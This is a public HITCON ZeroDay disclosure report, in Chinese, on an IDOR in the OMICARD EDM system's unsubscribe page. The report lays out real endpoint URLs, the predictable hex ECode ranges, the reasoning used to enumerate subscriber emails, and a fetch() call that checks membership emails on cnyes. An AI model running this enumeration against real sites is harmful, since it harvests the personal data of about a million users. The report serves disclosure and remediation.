沛盛資訊 OMICARD EDM行銷發送系統 "取消訂閱電子報" 功能 IDOR,可枚舉粗估百萬會員之 Email - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-01502
  •  發信 Vendor: 沛盛資訊有限公司
  • Title: 沛盛資訊 OMICARD EDM行銷發送系統 "取消訂閱電子報" 功能 IDOR,可枚舉粗估百萬會員之 Email
  • Introduction: "取消訂閱電子報" 功能 IDOR,可枚舉粗估百萬會員之 Email

處理狀態

目前狀態

公開
Last Update : 2026/02/26
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2025/12/12 23:10:14 : 新提交 (由 yusheng 更新此狀態)
  • 2025/12/18 17:02:48 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/01/05 12:20:27 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/01/05 12:20:27 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/01/05 12:20:27 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/02/11 03:00:09 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2026/02/13 11:48:06 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/02/13 20:25:01 : 確認已修補 (由 yusheng 更新此狀態)
  • 2026/02/26 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2025-01502
  • 通報者:cat1528985 (yusheng)
  • 風險:嚴重
  • 類型:不安全的直接存取物件 (Insecure Direct Object References, IDOR)

參考資料

攻擊者可經由該漏洞取得系統中的其他使用者的資料或是系統檔案。

OWASP Top 10 - 2013 A4 - Insecure Direct Object References
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References

Insecure Direct Object Reference Prevention Cheat Sheet
https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet.md

OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://newmx.cnyes.com/ExternalLinks/UnSubscribe.aspx?ECode=@@1
http://crm4.itpison.com/ExternalLinks/UnSubscribe.aspx?ECode=@@4cf00001
http://113.196.228.49/ExternalLinks/UnSubscribe.aspx?ECode=@@23fff

敘述

PoC

  • Simple HTTP(s) GET Request
  • No Auth Required
  • ECode 是可預測的 16 進位制流水號

(1) newmx.cnyes.com (鉅亨網) (私雲)

(2) 沛盛資訊的 domain, IP (公雲)

recon & exploit 過程

  1. 從鉅亨網的會員報,發現 "取消訂閱" 的網址,修改 querystring 的 ECode 參數後,會顯示其他人的 Email
  2. 使用其他帳號註冊鉅亨網,蒐集更多會員報的 "取消訂閱" 樣本,嘗試推導出 ECode 的格式
    2025/12/08 鉅亨會員報:【債券熱議】美元以外,多元貨幣佈局必要性?
    帳號A: ECode=bc743/7ffff7a5/115b433/31a7/2efa/1ee7/e/1170/804
    2025/12/10 鉅亨會員報: 佈局新興債前,熱門 3大投資疑問一次解答!
    帳號A: ECode=bc91a/45b35/115b433/31ad/2eff/1ee9/e/1170/804
    帳號B: ECode=bc91a/52cac/11776a9/31ad/2eff/1ee9/e/1170/804
    2025/12/11 鉅亨晨訊:〈美股盤後〉Fed3度降息 股債齊揚 標普逼近歷史新高
    帳號B: ECode=bc9eb/111d0/11776a9/31af/2f00/1e6f/e/1111/804
    帳號C: ECode=bc9eb/138cd/11776da/31af/2f00/1e6f/e/1111/804
    2025/12/12 鉅亨晨訊:〈美股盤後〉甲骨文拖累AI概念股 那指費半齊收墨 道瓊標普雙雙創新高
    帳號B: ECode=bcabd/2173e/11776a9/31b0/2f01/1e6f/e/1111/804
    帳號C: ECode=bcabd/1f42b/11776da/31b0/2f01/1e6f/e/1111/804
  3. 從以上數據,可以看出 ECode 格式 => 是用 / 分隔的區塊,並且有蠻多重複的區塊,且部分區塊是 Hex 流水號
  4. 逐步將每個區塊的內容移除,觀察到以下 ECode 的 Response,都包含同樣的 Email 
    bc743/7ffff7a5/115b433/31a7/2efa/1ee7/e/1170/804
bc743/7ffff7a5/115b433/31a7/2efa/1ee7/e/1170
bc743/7ffff7a5/115b433/31a7/2efa/1ee7/e
bc743/7ffff7a5/115b433/31a7/2efa/1ee7
bc743/7ffff7a5/115b433/31a7/2efa
bc743/7ffff7a5/115b433//2efa
bc743/7ffff7a5///2efa
//7ffff7a5///2efa
  5. 嘗試將 ///2efa 移除,觀察到 Email 變成 sandy****@msa.hinet.net
  6. 發現前兩個 // 可以替換成不同 replacer,都指向同樣的 sandy****@msa.hinet.net,但 replacer 不可跟後面的字元重複 
    @@7ffff7a5
**7ffff7a5
  7. 嘗試替換 7ffff7a5,從 0 開始逐步增加,根據前面的 ECode 格式只有 0-f 跟 /,可以推理出 ECode 是 Hex。利用這個規則,就可以枚舉大量 Email 
    @@1 => twenty****@gmail.com
@@2 => gc****@gmail.com
@@3 => cindy****@hotmail.com
...
@@f => luca*****************@outlook.com
  8. 為了驗證 Email 是否合法,而不是隨機產生,以 "鉅亨網" 為例,在其 鉅亨電子報 找到了一隻 "isMemberEmail" 的 API(無須登入即可驗證),確認 @@1 對應的 Email 真的是 "鉅亨網" 的會員 
    fetch("https://member.api.cnyes.com/member/api/v1/user/email/isMemberEmail", {
headers: {
"content-type": "application/json",
"x-platform": "WEB",
"x-system-kind": "LOBBY",
},
body: JSON.stringify({ email: "twenty****@gmail.com" }),
method: "POST",
credentials: "omit",
}).then(res => res.json()).then(console.log)

    圖片

如何判斷是 {沛盛資訊 OMICARD EDM行銷發送系統}

  1. 從沛盛資訊的官網 - 完整的OMICard使用手冊,第 8 頁,可以得知公雲跟私雲兩種模式。私雲(以鉅亨網為案例),可在 /OMICardWeb/Login.aspx 看到 OMICard 的登入頁
    圖片

  2. 公雲,可透過各種 Reverse IP, WHOIS, shodan, securitytrails 工具,得知沛盛資訊的 domain (itpison), IP (113.196.228.0-255)

目前已知的影響範圍

  1. 鉅亨網(私雲): https://newmx.cnyes.com/ExternalLinks/UnSubscribe.aspx?ECode=@@1 ~ @@95128
  2. 沛盛(公雲1): http://crm4.itpison.com/ExternalLinks/UnSubscribe.aspx?ECode=@@4cf00001 ~ @@53fa0c8f
  3. 沛盛(公雲2): http://113.196.228.49/ExternalLinks/UnSubscribe.aspx?ECode=@@23fff ~ @@cd690

截止 2025/12/12 10:19,測試有回傳會員 Email 的流水號區間如上,由於

  • 不能直接枚舉所有會員 Email,僅能透過測試區間的上限來推算大約的會員數量
  • 區間的上限,會隨著時間增加(推測是每天都會有新會員註冊)
  • 可能有潛在的更多企業也使用 {沛盛資訊 OMICARD EDM行銷發送系統}

算法:

  1. 鉅亨網(私雲): HexToDecimal(95128) => 610600 => 61 萬會員
  2. 沛盛(公雲1): 這邊的區間,有較多的空值(推測是企業的合約到期,則該區段的會員 Email 就查不到),故不好估算
  3. 沛盛(公雲2): HexToDecimal(cd690 - 23fff) => 693905 => 69 萬會員

結論 => 粗估至少百萬會員之 Email 外洩

CVSS 評分

AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

精確分數:8.6 (CVSS v3.1) High

  • AV:N:遠端可利用(Network)
  • AC:L:攻擊難度低(可枚舉/預測 ID)
  • PR:N:無需認證
  • UI:N:無需使用者互動
  • S:C:因為可跨多個租戶 / 影響廠商自有與客戶站(公雲/私雲) → Scope Changed
  • C:H:大量 PII(百萬級 Email)→ 機密性影響為 High
  • I:N / A:N:未直接可導致資料被篡改或服務不可用,所以 Integrity/Availability 為 None

{沛盛資訊 OMICARD EDM行銷發送系統} 過往 CVEs

受影響版本

未知。因無法找到 "可識別 OMICard 版本號" 的 fingerprint,煩請聯繫廠商確認

修補建議

使用不可預測的 id 來映射到 Email
可考慮加上簽章,確保 ECode 不可被竄改

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;